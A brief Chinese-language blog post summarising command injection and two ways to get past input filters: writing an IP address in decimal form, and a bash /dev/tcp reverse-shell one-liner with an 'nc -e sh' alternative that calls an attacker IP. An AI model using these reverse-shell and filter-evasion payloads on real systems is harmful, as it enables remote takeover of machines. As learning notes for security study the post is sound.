命令注入繞過小結

學到的東西,拎出來,總結總結,分享出來,纔是完整的學習過程我覺得。

一、命令注入

官方的解釋:即 Command Injection。是指通過提交惡意構造的參數破壞命令語句結構,從而達到執行惡意命令的目的。

記得師傅用一句話概括注入的本質:就是把非法的輸入當做代碼來執行了。

二、繞過

  • .號被過濾,無法執行反彈目標機器的IP(例:192.168.1.1)時,將IP轉成十進制進行繞過。(172.16.3.178=>2886730180)
  • \ / " 被過濾,無法執行echo "bash -i >& /dev/tcp/172.16.1.75/4444 0>&1" | bash這種類型反彈,可用 nc -e sh 2886730180 4444從推特大佬那學的,但我沒試成功,因爲nc -e提示沒有該功能,知道的表哥可以告知下怎麼回事
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章